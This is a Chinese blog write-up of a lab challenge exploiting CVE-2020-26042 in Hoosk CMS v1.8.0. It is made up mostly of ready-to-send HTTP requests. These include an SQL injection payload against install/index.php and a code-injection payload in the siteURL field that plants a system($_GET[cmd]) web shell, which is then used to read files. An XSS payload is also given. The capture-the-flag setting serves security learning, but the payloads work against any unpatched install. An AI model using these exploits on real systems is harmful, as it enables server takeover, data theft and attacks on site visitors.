春秋云镜 CVE-2020-26042

最新推荐文章于 2024-04-17 10:48:18 发布

isbug0

最新推荐文章于 2024-04-17 10:48:18 发布

阅读量251

点赞数 1

分类专栏：靶场文章标签：安全 web安全

本文链接：https://blog.csdn.net/qq_22002773/article/details/132141073

版权

靶场专栏收录该内容

84 篇文章 3 订阅

订阅专栏

春秋云镜 CVE-2020-26042 Hoosk CMS v1.8.0 存在sql注入漏洞

靶标介绍

Hoosk CMS v1.8.0 install/index.php 存在sql注入漏洞。

启动场景

在这里插入图片描述

漏洞利用

SQL注入POC

POST /install/index.php HTTP/1.1
Host: xxxx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 122

siteName=',siteTitle%3dversion()%23&siteURL=http%3A%2F%2Fa.com&dbName=hoosk&dbUserName=root&dbPass=123456&dbHost=localhost

burp抓包

POST /install/index.php HTTP/1.1
Host: eci-2zege7z5glwxpnyr3q13.cloudeci1.ichunqiu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 120
Origin: http://eci-2zege7z5glwxpnyr3q13.cloudeci1.ichunqiu.com
Connection: close
Referer: http://eci-2zege7z5glwxpnyr3q13.cloudeci1.ichunqiu.com/install/
Upgrade-Insecure-Requests: 1

siteName=',siteTitle%3dversion()%23&siteURL=http%3A%2F%2Fa.com&dbName=mysql&dbUserName=root&dbPass=root&dbHost=localhost

在这里插入图片描述
访问首页

获取当前数据库database()
当前数据库为MySQL

获取mysql所有的表名

未找到flag字段，获取所有的数据库
在这里插入图片描述

information_schema,cms,mysql,performance_schema,sys

在这里插入图片描述
找寻无果，gg,还是RCE吧
RCE POC

POST /install/index.php HTTP/1.1
Host: XXXXX
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 147

siteName=test&siteURL=http%3A%2F%2Fa.com%2F%27%29%3Bphpinfo%28%29%3Bexit%28%29%3B%2F%2F&dbName=hoosk&dbUserName=root&dbPass=123456&dbHost=localhost

burp改包

POST /install/index.php HTTP/1.1
Host: eci-2zege7z5glwxpnyr3q13.cloudeci1.ichunqiu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 160
Origin: http://eci-2zege7z5glwxpnyr3q13.cloudeci1.ichunqiu.com
Connection: close
Referer: http://eci-2zege7z5glwxpnyr3q13.cloudeci1.ichunqiu.com/install/
Upgrade-Insecure-Requests: 1

siteName=test&siteURL=http%3A%2F%2Fa.com%2F')%3Bsystem(%24_GET%5Bcmd%5D)%3Bphpinfo()%3Bexit()%3B%2F%2F&dbName=mysql&dbUserName=root&dbPass=root&dbHost=localhost

http://eci-2zege7z5glwxpnyr3q13.cloudeci1.ichunqiu.com
在这里插入图片描述
http://eci-2zege7z5glwxpnyr3q13.cloudeci1.ichunqiu.com/?cmd=cat%20…/…/…/flag

得到flag

flag{437833f0-f671-4139-9a32-005a1f8b36bc}

附带个XSS poc

POST /code-env/Hoosk-master/install/index.php HTTP/1.1
Host: xxxx
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 129

siteName=test&siteURL="<script>alert(1)</script>&dbName=hoosk&dbUserName=root&dbPass=123456&dbHost=localhost%3A3306